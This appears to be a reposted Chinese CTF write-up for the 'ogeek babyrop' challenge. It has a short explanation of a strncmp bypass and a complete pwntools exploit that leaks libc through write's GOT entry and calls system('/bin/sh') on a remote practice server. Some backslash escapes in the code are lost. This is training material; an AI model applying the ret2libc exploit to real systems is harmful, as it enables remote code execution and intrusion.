zoukankan      html  css  js  c++  java
  • ogeek babyrop

    拖入ida

     

     

    先用strncmp使一个随机数与输入比对,这里可以用x00跳过strncmp

    然后read()中的a1是我们输入x00后的值

    写exp

    from pwn import *
    
    sh=remote('node1.buuoj.cn',28560)
    #sh=process('/home/harmonica/Desktop/oppo/rop/babyrop')
    elf=ELF('/home/harmonica/Desktop/oppo/rop/babyrop')
    libc=ELF('/home/harmonica/Desktop/oppo/rop/libc-2.23.so')
    
    bin_sh_off=0x0015902b
    system_off=0x0003a940
    
    write_plt = elf.plt['write']
    write_got = elf.got['write']
    main=0x08048825
    
    payload='x00'+'xff'*7
    sh.sendline(payload)
    sh.recvuntil('Correct
    ')
    
    payload='a'*0xe7+'bbbb'+p32(write_plt)+p32(main)+p32(1)+p32(write_got)
    sh.sendline(payload)
    
    write_addr = u32(sh.recv()[0:4])
    libcbase = write_addr - libc.sym['write']
    log.success("libcbase: "+hex(libcbase))
    
    system_addr = libcbase + system_off
    binsh_addr = libcbase + bin_sh_off
    
    payload='x00'+'xff'*7
    sh.sendline(payload)
    sh.recvuntil('Correct
    ')
    
    payload='a'*0xe7+'bbbb'+p32(system_addr)+'bbbb'+p32(binsh_addr)
    sh.sendline(payload)
    
    sh.interactive()

    得到flag

  • 相关阅读:
    MySQL大数据分页调优实践
    CentOS 搭建L2TP
    CentOS 搭建SS5
    CentOS 搭建PPTP
    CentOS 防火墙 firewalld
    CentOS 初始化账号
    nginx升级与回退
    Python
    python
    linux
  • 原文地址:https://www.cnblogs.com/harmonica11/p/11568166.html
Copyright © 2011-2022 走看看